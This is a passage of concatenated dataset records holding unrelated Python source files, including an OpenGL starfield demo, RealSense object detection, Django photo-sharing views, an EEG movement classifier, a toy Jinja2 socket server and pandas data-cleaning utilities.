glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)\r\n\r\n glTexEnvi(GL_POINT_SPRITE, GL_COORD_REPLACE, GL_TRUE)\r\n glTexEnvi(GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_DECAL)\r\n\r\n # Called to draw scene\r\ndef DrawGLScene():\r\n \r\n x = 700.0 # Location and radius of moon\r\n y = 500.0\r\n r = 50.0\r\n angle = 0.0 # Another looping variable\r\n\r\n # Clear the window\r\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\r\n \r\n # Everything is white\r\n glColor3f(1.0, 1.0, 1.0)\r\n \r\n if (drawMode == 3):\r\n glEnable(GL_POINT_SPRITE)\r\n glEnable(GL_TEXTURE_2D)\r\n glBindTexture(GL_TEXTURE_2D, textureObjects[0])\r\n glEnable(GL_BLEND)\r\n \r\n # Draw small stars\r\n glPointSize(7.0)\r\n glBegin(GL_POINTS)\r\n for i in range(0, SMALL_STARS):\r\n glVertex2fv(vSmallStars[i])\r\n glEnd()\r\n \r\n # Draw medium sized stars\r\n glPointSize(12.0)\r\n glBegin(GL_POINTS)\r\n for i in range(0, MEDIUM_STARS):\r\n glVertex2fv(vMediumStars[i])\r\n glEnd()\r\n \r\n # Draw largest stars\r\n glPointSize(20.0)\r\n glBegin(GL_POINTS)\r\n for i in range(0, LARGE_STARS):\r\n glVertex2fv(vLargeStars[i])\r\n glEnd()\r\n \r\n \r\n glPointSize(120.0)\r\n if (drawMode == 3):\r\n glDisable(GL_BLEND)\r\n glBindTexture(GL_TEXTURE_2D, textureObjects[1])\r\n \r\n glBegin(GL_POINTS)\r\n glVertex2f(x, y)\r\n glEnd()\r\n \r\n glDisable(GL_TEXTURE_2D)\r\n glDisable(GL_POINT_SPRITE)\r\n\r\n # Draw distant horizon\r\n glLineWidth(3.5)\r\n glBegin(GL_LINE_STRIP)\r\n \r\n glVertex2f(0.0, 25.0)\r\n glVertex2f(50.0, 100.0)\r\n glVertex2f(100.0, 25.0)\r\n glVertex2f(225.0, 115.0)\r\n glVertex2f(300.0, 50.0)\r\n glVertex2f(375.0, 100.0)\r\n glVertex2f(460.0, 25.0)\r\n glVertex2f(525.0, 100.0)\r\n glVertex2f(600.0, 20.0)\r\n glVertex2f(675.0, 70.0)\r\n glVertex2f(750.0, 25.0)\r\n glVertex2f(800.0, 90.0)\r\n \r\n glEnd()\r\n\r\n glutSwapBuffers() \r\n \r\n \r\ndef ReSizeGLScene(w, h):\r\n # Prevent a divide by zero\r\n if(h == 0):\r\n h = 1\r\n \r\n # Set Viewport to window dimensions\r\n glViewport(0, 0, w, h)\r\n\r\n # Reset projection matrix stack\r\n glMatrixMode(GL_PROJECTION)\r\n glLoadIdentity()\r\n\r\n # Establish clipping volume (left, right, bottom, top, near, far)\r\n gluOrtho2D(0.0, SCREEN_X, 0.0, SCREEN_Y)\r\n\r\n\r\n # Reset Model view matrix stack\r\n glMatrixMode(GL_MODELVIEW)\r\n glLoadIdentity()\r\n \r\ndef keyPressed(key, x, y):\r\n if key == ESCAPE:\r\n glutDestroyWindow(window)\r\n sys.exit()\r\n\r\n \r\n# Main program entry point\r\nif __name__ == '__main__':\r\n\r\n glutInit()\r\n glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_ALPHA | GLUT_DEPTH)\r\n glutInitWindowSize(640, 480)\r\n glutInitWindowPosition(0, 0)\r\n window = glutCreateWindow(\"Smoothing Out The Jaggies\")\r\n \r\n glutDisplayFunc(DrawGLScene)\r\n\r\n # Uncomment this line to get full screen.\r\n #glutFullScreen()\r\n \r\n #glutIdleFunc(DrawGLScene)\r\n #glutTimerFunc( int(1.0/60.0), update, 0)\r\n \r\n glutReshapeFunc(ReSizeGLScene)\r\n glutKeyboardFunc(keyPressed)\r\n # glutSpecialFunc (specialkeyPressed);\r\n\r\n # Initialize our window. 
\r\n    InitGL(640, 480)\r\n    \r\n    # Start Event Processing Engine\t\r\n    glutMainLoop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"chapt09/pointsprites.py","file_name":"pointsprites.py","file_ext":"py","file_size_in_byte":7741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"478261339","text":"\nfrom edgetpu.detection.engine import DetectionEngine\nfrom PIL import Image\nimport pyrealsense2 as rs\nimport numpy as np\nimport argparse\nimport imutils\nimport time \nimport sys\nimport cv2\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-m\", \"--model\", required=True, help=\"path to Tensorflow Lite object detection model\")\nap.add_argument(\"-l\", \"--labels\", required=True, help=\"path to labels file\")\nap.add_argument(\"-c\", \"--confidence\", type=float, default=0.3, help = \"Confidence threshold expressed as a decimal\")\nap.add_argument(\"-w\", \"--width\", type = int, default = 500, help = \"Size of image as it's inputted into the model\")\nap.add_argument(\"-i\", \"--info\", type = int, default = 0, help = \"Prints relevant runtime information in the console on startup\")\nargs = vars(ap.parse_args())\n\nlabels={}\n\nfor row in open(args[\"labels\"]):\n    (classID, label) = row.strip().split(maxsplit=1)\n    labels[int(classID)] = label.strip()\n\nprint(\"Tensorflow-Lite model loading...\")\nmodel = DetectionEngine(args[\"model\"])\n\nprint(\"Initializing Realsense...\")\npipeline = rs.pipeline()\nconfig = rs.config()\ndepth_resolution_x =640\ndepth_resolution_y =480\ncolor_resolution_x =640\ncolor_resolution_y =480\ndepth_fps =30\ncolor_fps =60\nconfig.enable_stream(rs.stream.depth, depth_resolution_x, depth_resolution_y, rs.format.z16, depth_fps) \nconfig.enable_stream(rs.stream.color, color_resolution_x, color_resolution_y, rs.format.bgr8, color_fps)\nprofile = pipeline.start(config)\ndepth_sensor = profile.get_device().first_depth_sensor()\ndepth_scale = depth_sensor.get_depth_scale()\n\nif args[\"info\"] > 0:\n    print(\"Depth Input: \",depth_resolution_x,\"x\",depth_resolution_y,\"at\",depth_fps,\"fps\")\n    print(\"Color Input: \",color_resolution_x,\"x\",color_resolution_y,\"at\",color_fps,\"fps\")\n\n#align_with = rs.stream.color\n#align = rs.align(align_with)\n\nstart_time = time.time()\nx = 1 # displays the frame rate every 1 second\ncounter = 0\n\n\nwhile True:\n    ##wait for a new frame and then get the depth and color frame \n    frames = pipeline.wait_for_frames() \n    depth_frame = frames.get_depth_frame()\n    color_frame = frames.get_color_frame()\n    if not depth_frame or not color_frame:\n        continue\n    \n    ##create numpy array of depth and color frames\n    depth_image = np.asanyarray(depth_frame.get_data())\n    color_image = np.asanyarray(color_frame.get_data())\n    ##resize image based upon argument and create a copy to annotate and display\n    color_image = imutils.resize(color_image, width=args[\"width\"])\n    orig = color_image\n    #color_image = cv2.cvtColor(color_image, cv2.COLOR_BGR2RGB)\n    color_image = Image.fromarray(color_image)\n\n    ##start a timer for inferencing time and feed the frame into the model \n    start_inference = time.time()\n    results = model.DetectWithImage(color_image, threshold=args[\"confidence\"],\n        keep_aspect_ratio=True, relative_coord=False)\n    end_inference = time.time()\n    \n    ##put a bounding box on the result in the copy image\n    for r in results:\n        bounding_box = r.bounding_box.flatten().astype(\"int\") #try changing r\n        (startX, startY, endX, endY) = bounding_box #try changing startx etc\n        label = 
labels[r.label_id]\n cv2.rectangle(orig, (startX, startY), (endX, endY),\n (0, 255, 0), 2)\n \n ##add a dot to the center of the bounding box\n centerX = int((startX - ((startX - endX)*0.5)))\n centerY = int((startY - ((startY - endY)*0.5)))\n cv2.circle(orig, (centerX, centerY), 1, (0, 255, 0), 2 )\n\n #-------Single Point-----------\n ##calculates depth of the center point of the bounding box\n depth = depth_image[centerY, centerX].astype(float)\n depth = depth * depth_scale\n #------------------------------\n \n #-----------Average------------\n ##calculates depth of the center point of the bounding box\n #depth_center = depth_image[centerY, centerX].astype(float)\n #depth_collection = depth_center + depth_image[(centerX+1), (centerY+1)].astype(float) + depth_image[(centerX+1), (centerY-1)].astype(float) + depth_image[(centerX-1), (centerY-1)].astype(float) + depth_image[(centerX-1), (centerY+1)].astype(float)\n #depth_average = depth_collection/5\n #depth = depth_average * depth_scale\n #print(depth)\n #------------------------------\n\n y = startY - 15 if startY - 15 > 15 else startY + 15\n text = \"{}: {:.2f}% {:.3f}\".format(label, r.score*100, depth) \n cv2.putText(orig, text, (startX,y),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0),2) #try changing font\n\n\n ##create the window to display the result\n cv2.namedWindow('Real Sense Object Detection', cv2.WINDOW_AUTOSIZE)\n cv2.imshow('Real Sense Object Detection', orig)\n key = cv2.waitKey(1) & 0xFF\n\n if args[\"info\"] > 0:\n ##create counter for measuring inference time and frames per second\n counter += 1\n if (time.time() - start_time) > x:\n print(\"FPS: \", counter / (time.time() - start_time))\n fps = []\n fps.append(counter / (time.time() - start_time))\n inference_time = []\n inference_time.append(end_inference - start_inference)\n counter = 0\n start_time = time.time()\n\n if key == ord(\"q\") or key == 27:\n break\n\n##calculate the average FPS and inference time \nif args[\"info\"] > 0:\n fps_sum = 0\n for num in fps:\n fps_sum += num\n fps_average = fps_sum / len(fps)\n print(\"Average FPS:\",fps_average)\n\n inference_sum = 0\n for num in inference_time:\n inference_sum += num\n inference_average = inference_sum / len(inference_time)\n print(\"Average Inference Time:\",inference_average) \n\n \npipeline.stop()\n \n \n\n","sub_path":"Realsense_Object_Detection_Public.py","file_name":"Realsense_Object_Detection_Public.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"142161884","text":"from django.conf.urls import url\n\nfrom . 
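The commented-out "Average" block in the Realsense record above mixes up axis order (depth_image is indexed [row, col], i.e. [y, x]); a median over a small window, indexed consistently, is a more robust way to read off object depth. A sketch of my own, keeping the same raw-units-times-depth_scale conversion:

```python
import numpy as np

# Sketch: median depth in meters over a (2k+1)^2 window around (center_x, center_y).
def window_depth(depth_image, center_x, center_y, depth_scale, k=2):
    h, w = depth_image.shape
    y0, y1 = max(center_y - k, 0), min(center_y + k + 1, h)
    x0, x1 = max(center_x - k, 0), min(center_x + k + 1, w)
    patch = depth_image[y0:y1, x0:x1].astype(float) * depth_scale
    return np.median(patch[patch > 0])   # ignore zero (invalid) readings
```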
import views\n\nurlpatterns = [\n    url(r'^chat/$', views.index, name='index'),\n    url(r'^save-theme/$', views.save_theme, name=\"save_theme\"),\n    url(r'^save-thumb/$', views.save_thumb, name=\"save_thumb\"),\n    url(r'^(?P[^/]+)/$', views.room, name='room'),\n]","sub_path":"cms_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"221214827","text":"from Spiff_report2 import *\n\nclass Jason_spiff(Spiff_report):\n\tdef __init__(self, spiff_name, fname_eclipse, fname_master):\n\t\tsuper().__init__(spiff_name, fname_eclipse, fname_master)\n\tdef transform_eclipse(self, t_dict, key):\n\t\ttemp = t_dict[key].split(' ')\n\t\tif len(temp) == 1: t_dict[\"CatMatch\"] = temp[0]\n\t\telif temp[0] == \"JASON\": t_dict[\"CatMatch\"] = temp[1]\n\t\telse: t_dict[\"CatMatch\"] = temp[0]\n\t\treturn\n\tdef transform_master(self, t_dict, key):\n\t\ttemp = t_dict[key]\n\t\tt_dict['CatMatchM'] = temp\n\t\treturn\n\tdef cust_clean(self):\n\t\tfor i in range(0, len(self.e_data)): self.e_data.transform_index(i, 'DESC', self.transform_eclipse)\n\t\tfor i in range(0, len(self.m_data)): self.m_data.transform_index(i, 'PART_ID', self.transform_master)\n\tdef cust_match(self):\n\t\tfor i in range(0, len(self.e_data)):\n\t\t\ttemp = self.e_data.get_index(i)\n\t\t\tcatnum = temp[\"CatMatch\"]\n\t\t\tloc = self.m_data.search('CatMatchM', catnum)\n\t\t\tif loc < 0:\n\t\t\t\ttemp['Spiff Match'] = \"N/A\"\n\t\t\t\tcontinue\n\t\t\tspiff = self.m_data.get_index(loc)['Spiff']\n\t\t\ttemp['Spiff Match'] = spiff","sub_path":"Jason_spiff.py","file_name":"Jason_spiff.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"125271251","text":"# import python modules\nimport sys\n\n# import external libraries\nimport numpy as np\nnp.set_printoptions(suppress=True)\n\n# import custom libraries\nfrom filters import *\nfrom fft_features import *\nfrom data_receive import *\nfrom models import *\n# from pi_bridge import *\n\n\ndef main():\n\tfilters = Filter()\n\ttransform = Transform()\n\tmodel = KerasModels()\n\t# pi = piConnectionServer()\n\n\twhile True:\n\t\tx = input(\"Enter 1 to start recording and press 'q' or 'Q' to exit: \")\n\t\tif x == '1':\n\t\t\tdata_getter = GanglionDataReceiver()\n\n\t\t\teeg_recording = data_getter.get_signal()\n\t\t\to1 = eeg_recording[0]\n\t\t\to2 = eeg_recording[1]\n\n\t\t\t# NOTCH WAS CALCULATED BUT WAS PASSED IMMEDIATELY TO BANDPASS SO IT WASNT VISIBLE. PLOTS ERROR\n\t\t\to1_notch = filters.notch_filter(o1)\n\t\t\to2_notch = filters.notch_filter(o2)\n\n\t\t\to1_filtered = filters.bp_filter(o1_notch)\n\t\t\to2_filtered = filters.bp_filter(o2_notch)\n\n\n\t\t\t# SAVING ARRAYS FOR PLOTTING\n\t\t\t# np.savez('alpha_front', o1=o1, o2=o2, o1_notch=o1_notch, o2_notch=o2_notch, o1_filtered=o1_filtered, o2_filtered=o2_filtered)\n\t\t\t# np.savez('alpha_back', o1=o1, o2=o2, o1_notch=o1_notch, o2_notch=o2_notch, o1_filtered=o1_filtered, o2_filtered=o2_filtered)\t\t\t\n\t\t\t# np.savez('alpha_left', o1=o1, o2=o2, o1_notch=o1_notch, o2_notch=o2_notch, o1_filtered=o1_filtered, o2_filtered=o2_filtered)\n\t\t\t# np.savez('alpha_right', o1=o1, o2=o2, o1_notch=o1_notch, o2_notch=o2_notch, o1_filtered=o1_filtered, o2_filtered=o2_filtered)\n\n\t\t\t# Inputs are returned normalized in the range of [0, 1]. 
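cust_match in the Jason_spiff record above does a linear self.m_data.search per Eclipse row; when the master list is large, building a one-time {catalog number: spiff} index makes each lookup O(1). A sketch of a drop-in body for cust_match, assuming get_index returns the row dicts shown in the transforms:

```python
# Sketch: one-pass index over the master data, then constant-time lookups.
spiff_by_cat = {}
for i in range(0, len(self.m_data)):
    row = self.m_data.get_index(i)
    spiff_by_cat[row['CatMatchM']] = row['Spiff']

for i in range(0, len(self.e_data)):
    row = self.e_data.get_index(i)
    row['Spiff Match'] = spiff_by_cat.get(row['CatMatch'], 'N/A')
```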
Check fft.py normalize()\n\t\t\to1_sum = transform.sum_fourier_trans(o1_filtered)\n\t\t\to2_sum = transform.sum_fourier_trans(o2_filtered)\n\n\t\t\t# append lists and then convert them to np array\n\t\t\tnn_input = np.asarray(o1_sum + o2_sum)\n\t\t\tnn_input.shape = (1, 8)\n\n\t\t\tpredictions = model.nn_model(nn_input)\n\t\t\tpredictions_list = [x.item() for x in predictions]\n\t\t\tpredicted_movement = predictions_list.index(max(predictions_list))\n\t\t\tif predicted_movement == 0:\n\t\t\t\tprint(predicted_movement, ' BACK')\n\t\t\t\t# pi.sendData('BACK')\n\t\t\telif predicted_movement == 1:\n\t\t\t\tprint(predicted_movement, ' FRONT')\n\t\t\t\t# pi.sendData('FRONT')\n\t\t\telif predicted_movement == 2:\n\t\t\t\tprint(predicted_movement, ' LEFT')\n\t\t\t\t# pi.sendData('LEFT')\n\t\t\telse:\n\t\t\t\tprint(predicted_movement, ' RIGHT')\n\t\t\t\t# pi.sendData('RIGHT')\n\n\t\telif x == 'q' or x == 'Q':\n\t\t\t# pi.sendData('q Q Entered. Exiting...')\n\t\t\t# pi.closeConnection()\n\t\t\tsys.exit()\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"computer_main.py","file_name":"computer_main.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"96243055","text":"from django.shortcuts import render, HttpResponseRedirect, HttpResponse\nfrom django.http import JsonResponse\nfrom django.views.generic import ListView, DetailView\nfrom .models import Posts, Comments\nfrom django.forms import ModelForm\nfrom django.views.generic.edit import CreateView, DeleteView, UpdateView\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse_lazy\nfrom django.http import Http404\n\n# Create your views here.\n\n\nclass PostListView(ListView):\n\n model = Posts\n template_name = 'index.html'\n\n def get_queryset(self):\n\n queryset = super(PostListView, self).get_queryset()\n q = self.request.GET.get('query')\n\n if q:\n return queryset.filter(description__icontains=q.strip())\n elif self.kwargs.get('user_id'):\n return queryset.filter(user=self.kwargs['user_id'])\n else:\n return queryset\n\n def get_context_data(self, **kwargs):\n context = super(PostListView, self).get_context_data(**kwargs)\n context['form'] = CommentForm\n return context\n\n\nclass CommentForm(ModelForm):\n\n class Meta:\n model = Comments\n fields = ['author', 'comment']\n\n\nclass PostDetailView(DetailView):\n\n model = Posts\n template_name = 'post.html'\n\n def get_context_data(self, **kwargs):\n context = super(PostDetailView, self).get_context_data(**kwargs)\n context['form'] = CommentForm(initial={'post': self.object.pk}, hide_condition=True)\n context['comments'] = Comments.objects.filter(post=self.object.pk)\n return context\n\n\nclass CommentCreate(CreateView):\n\n model = Comments\n form_class = CommentForm\n template_name = 'index.html'\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n obj.post = Posts.objects.get(pk=self.kwargs['post_id'])\n obj.save()\n return HttpResponseRedirect('/')\n\n def get_context_data(self, **kwargs):\n context = super(CommentCreate, self).get_context_data(**kwargs)\n context['object_list'] = Posts.objects.all()\n return context\n\n def get_success_url(self):\n return reverse('home')\n\n\nclass PostForm(ModelForm):\n\n class Meta:\n model = Posts\n fields = ['photo', 'description']\n\n\nclass NewPostCreate(LoginRequiredMixin, CreateView):\n login_url = 'login'\n redirect_field_name = 'index.html'\n\n model = 
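Note on the EEG snippet above: the four print/sendData branches differ only in the label, and `predictions_list.index(max(...))` re-implements argmax by hand. A runnable sketch of the same dispatch with `np.argmax` and a lookup table, label order copied from the script:

import numpy as np

COMMANDS = {0: 'BACK', 1: 'FRONT', 2: 'LEFT', 3: 'RIGHT'}

predictions = np.array([[0.1, 0.7, 0.05, 0.15]])   # stand-in model output
move = int(np.argmax(predictions))
print(move, COMMANDS[move])                        # 1 FRONT
# pi.sendData(COMMANDS[move]) would replace the four duplicated branches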
Posts\n form_class = PostForm\n template_name = 'newpost.html'\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n obj.user = self.request.user\n obj.save()\n return HttpResponseRedirect('/')\n\n def get_context_data(self, **kwargs):\n context = super(NewPostCreate, self).get_context_data(**kwargs)\n context['object_list'] = Posts.objects.all()\n return context\n\n\ndef like_post(request):\n post_id = request.GET.get('post_id', None)\n like = 0\n if post_id:\n post = Posts.objects.get(id=int(post_id))\n if post is not None:\n like = post.like + 1\n post.like = like\n post.save()\n return HttpResponse(like)\n\n\ndef create_comment(request, post_id):\n\n new_comment = CommentForm(data=request.POST)\n response_data = {}\n\n if new_comment.is_valid():\n comment = new_comment.save(commit=False)\n comment.post = Posts.objects.get(id=post_id)\n comment.save()\n\n response_data['author'] = comment.author\n response_data['comment'] = comment.comment\n response_data['datetime'] = comment.datetime\n\n return JsonResponse(response_data)\n\n\nclass PostDelete(LoginRequiredMixin, DeleteView):\n\n model = Posts\n template_name = 'posts_confirm_delete.html'\n success_url = reverse_lazy('home')\n\n def get_object(self, queryset=None):\n\n obj = super(PostDelete, self).get_object()\n if not obj.user == self.request.user:\n raise Exception('Unauthenticated user!!!')\n return obj\n","sub_path":"fotogram_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"263595468","text":"import re\n\nimport connexion\nfrom flask import g\n\n\nfrom swagger_server.configuration.exceptions import Unauthorized\nfrom swagger_server.configuration.signal import unauthorized_hook\n\nchave_autenticacao = \"x-api-key\"\n\n\n\n\n\ndef before_request():\n g.username = \"\"\n\n allowed_urls = [\n \"/v2/ui\",\n \"/v2/ui/\",\n \"/v2/swagger.json\",\n \"/v2/ping\",\n \"/v2/ping/\",\n ]\n\n if connexion.request.method == 'OPTIONS':\n return\n\n print(f\"Verificando se a url precisa de autorizacao\")\n\n for allowed_url in allowed_urls:\n if re.match(allowed_url, connexion.request.path):\n print(f\"Url nao precisa de autorizacao\")\n return\n\n x_api_key = connexion.request.headers.get(\"x-api-key\")\n if x_api_key is None or x_api_key!=chave_autenticacao:\n unauthorized_hook.send()\n raise Unauthorized\n\n\n@unauthorized_hook.connect\ndef sinal_nao_autorizado(identity=None,**kwargs):\n return print(\"Sinal de LOGIN NAO AUTORIZADO enviado\")\n","sub_path":"swagger_server/configuration/context_handler.py","file_name":"context_handler.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"25590762","text":"import model\r\nimport repository\r\n\r\n\r\ndef insert_bookmark(session):\r\n session.execute(\r\n \"INSERT INTO bookmarks (id, title, url, notes, date_added)\"\r\n ' VALUES (5,\"google5\",\"https://www.google5.com/\",\"google5 website\", \"2021-03-24 03:56:33.961691\")'\r\n )\r\n [[bookmark_url]] = session.execute(\r\n \"SELECT url FROM bookmarks WHERE url=:url \",\r\n dict(url=\"https://www.google5.com/\"),\r\n )\r\n return bookmark_url\r\n\r\n\r\ndef test_repository_can_save_a_bookmark(session):\r\n bookmark = model.Bookmark(6,\"google6\",\"https://www.google6.com/\",\"google6 website\", \"2021-03-24 03:56:33.961691\")\r\n\r\n repo = repository.SqlAlchemyRepository(session)\r\n repo.add(bookmark)\r\n 
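Note on the context_handler snippet above: `re.match(allowed_url, path)` anchors only at the start, so whitelisting "/v2/ping" also lets "/v2/ping-admin" through, and the API key is compared with `!=`, which leaks timing information. A runnable sketch, assuming exact-path whitelisting was the intent (the allowed paths and the placeholder secret are copied from the snippet):

import hmac

SECRET_KEY = "x-api-key"   # placeholder secret, as in the snippet
ALLOWED = {"/v2/ui", "/v2/ui/", "/v2/swagger.json", "/v2/ping", "/v2/ping/"}

def is_authorized(path, presented_key):
    if path in ALLOWED:    # exact match, not a prefix regex
        return True
    return presented_key is not None and hmac.compare_digest(
        presented_key, SECRET_KEY)   # constant-time comparison

print(is_authorized("/v2/ping", None))         # True
print(is_authorized("/v2/ping-admin", None))   # False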
session.commit()\r\n\r\n rows = session.execute(\r\n 'SELECT id, title, url, notes, date_added FROM \"bookmarks\"'\r\n )\r\n assert list(rows) == [(6,\"google6\",\"https://www.google6.com/\",\"google6 website\", \"2021-03-24 03:56:33.961691\")]\r\n\r\n\r\n","sub_path":"barky_flask_1/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"26210082","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# __author__ = \"Q1mi\"\n# Date: 2017/8/25\n\n\"\"\"\njinja2演示示例\n\"\"\"\n\nimport socket\n\nimport pymysql\n\n\ndef f1():\n conn = pymysql.connect(host=\"127.0.0.1\", port=3306, user=\"root\", passwd=\"root1234\", db=\"TEST1\")\n cursor = conn.cursor(cursor=pymysql.cursors.DictCursor)\n cursor.execute(\"select uid, name, department_id from userinfo\")\n user_list = cursor.fetchall()\n cursor.close()\n conn.close()\n print(user_list)\n\n with open(\"jinja2示例.html\") as f:\n source_data = f.read()\n\n # 使用jinja2模板渲染\n from jinja2 import Template\n template = Template(source_data)\n data = template.render(user_list=user_list)\n\n return data\n\n\ndef f2():\n return \"ooo->f2\"\n\n\nrouters = [\n (\"/jinja2\", f1),\n (\"/ooo\", f2),\n]\n\n\ndef run():\n s = socket.socket()\n s.bind((\"127.0.0.1\", 8080))\n s.listen(5)\n while True:\n conn, addr = s.accept() # 暂时挂起\n data = conn.recv(8096)\n data = str(data, encoding=\"utf-8\")\n head, body = data.split(\"\\r\\n\\r\\n\")\n value_list = head.split(\"\\r\\n\")\n method, url, protocal = value_list[0].split(\" \")\n\n conn.send(b\"HTTP/1.1 200 OK\\r\\n\\r\\n\")\n\n func_name = None\n for i in routers:\n if i[0] == url:\n func_name = i[1]\n break # 找到一个不需要往下找了\n if func_name: # 如果有这个函数\n response = func_name()\n else:\n response = \"404\"\n\n conn.send(bytes(response, encoding=\"UTF-8\"))\n conn.close()\n\n\nif __name__ == '__main__':\n run()","sub_path":"about_django/Web框架/jinja2渲染示例.py","file_name":"jinja2渲染示例.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"396048137","text":"from Midas.databases import mongo_to_df, load_df_to_postgres, MongoInterface\nfrom Midas.configs import default_db, raw_data_collection\n\nimport numpy as np\nimport pandas as pd\nfrom pandas.api.types import is_numeric_dtype\nfrom sklearn import preprocessing\nfrom sklearn.decomposition import PCA\n\n\ndef remove_row_with_missing(df):\n return df.dropna()\n\n\ndef remove_col_with_no_data(df):\n to_drop = []\n for col in df.columns:\n # determine if there's only 1 unique value\n if df[col].nunique() == 1:\n to_drop.append(col)\n\n return df.drop(to_drop, axis=\"columns\")\n\n\ndef impute_numeric(series, strategy):\n def _impute_to_mean(series):\n return series.fillna(value=series.mean())\n\n def _impute_to_median(series):\n return series.fillna(value=series.median())\n\n if strategy == \"mean\":\n return _impute_to_mean(series)\n elif strategy == \"median\":\n return _impute_to_median(series)\n else:\n return None\n\n\ndef impute_categorical(series, strategy):\n def _impute_to_missing(series):\n return series.fillna(value=\"missing\")\n\n if strategy == \"fill_with_missing\":\n return _impute_to_missing(series)\n else:\n return None\n\n\ndef imputation(df, label_mapping, numeric_strategy, categorical_strategy):\n if label_mapping:\n for col in df.columns:\n if col in label_mapping[\"numeric\"]:\n df[col] = impute_numeric(df[col], 
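Note on the jinja2 mini-server above: the `routers` list is scanned linearly with a manual break and a flag variable; a dict keyed by URL gives O(1) dispatch and drops the bookkeeping. A runnable sketch with the same two handlers (bodies are stand-ins):

def f1():
    return "jinja2 page"    # stand-in for the template-rendering view

def f2():
    return "ooo->f2"

ROUTES = {"/jinja2": f1, "/ooo": f2}

def dispatch(url):
    handler = ROUTES.get(url)
    return handler() if handler else "404"

print(dispatch("/ooo"))       # ooo->f2
print(dispatch("/missing"))   # 404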
numeric_strategy)\n elif col in label_mapping[\"categorical\"]:\n df[col] = impute_categorical(df[col], categorical_strategy)\n return df\n\n\ndef clean_training_data(filepath, standardize, outliers, variance_retained, label_mapping, numeric_strategy, categorical_strategy):\n df = pd.read_csv(filepath)\n\n if not numeric_strategy:\n numeric_strategy = \"mean\"\n if not categorical_strategy:\n categorical_strategy = \"fill_with_missing\"\n\n return clean_data(df, label_mapping, numeric_strategy, categorical_strategy, outliers, standardize, variance_retained)\n\ndef clean_data(\n df,\n label_mapping,\n # numeric_strategy=\"mean\",\n # categorical_strategy=\"fill_with_missing\",\n numeric_strategy,\n categorical_strategy,\n outliers=None,\n standardize=None,\n variance_retained=0,\n):\n\n # cleaning process\n\n # force datatypes for categorical data to str\n for features in label_mapping[\"categorical\"]:\n df[features] = df[features].astype(str)\n\n df = remove_outliers(df, outliers)\n\n df = standardize_numeric_features(df, label_mapping[\"numeric\"], standardize)\n\n df = imputation(df, label_mapping, numeric_strategy, categorical_strategy)\n\n # this step breaks the data cleaning process\n # df = dimensionality_reduction_using_PCA(df, variance_retained)\n\n return df\n\n\n# Removes outliers in numeric features outside of (Q1 - 1.5 * IQR, Q3 + 1.5 * IQR)\n# When argument outliers is set to 'obs', the entire row (observation) is removed\n# When argument 'outliers is set to 'value', the outlier value is recoded to missing\n\n# Use: outliers = None obs value\ndef remove_outliers(in_df, outliers):\n in_data = in_df.copy()\n if outliers:\n features = list(in_data)\n for feature in features:\n if is_numeric_dtype(in_data[feature]) and in_data[feature].nunique() > 2:\n # get bounds\n sorted_feature = sorted(in_data[feature])\n q1, q3 = np.percentile(sorted_feature, [25, 75])\n iqr = q3 - q1\n lower_bound = q1 - (1.5 * iqr)\n upper_bound = q3 + (1.5 * iqr)\n if (outliers) == \"obs\":\n in_data.drop(\n in_data[in_data[feature] < lower_bound].index, inplace=True\n )\n in_data.drop(\n in_data[in_data[feature] > upper_bound].index, inplace=True\n )\n elif (outliers) == \"value\":\n in_data.loc[in_data[feature] < lower_bound, feature] = np.nan\n in_data.loc[in_data[feature] > upper_bound, feature] = np.nan\n return in_data\n\n\n# Standardizes all numeric features such that each feature mean = 0 and variance = 1\ndef standardize_numeric_features(in_df, columns, standardize):\n in_data = in_df.copy()\n if standardize:\n scaler = preprocessing.StandardScaler()\n for feature in columns:\n try:\n # we might have removed a column as useless\n if is_numeric_dtype(in_data[feature]) and in_data[feature].nunique() > 2:\n in_data[feature] = scaler.fit_transform(in_data[feature].to_frame())\n except KeyError:\n pass\n return in_data\n\n\n# Uses PCA to reduce the dimensionality of the numeric features. The original\n# numeric features are dropped and replaced by a set of new principal components\n# The number of components selected are the minimum needed to ensure that\n# at least x 'variance explained' is retained. In other words, 30 components might be\n# required to ensure that .95 of the variance in the original set of 100 features is\n# retained\n# NOTE: PCA requires imputed data (no missing)\n\n# Use: variance_retained = .95. 0 means don't use PCA. 
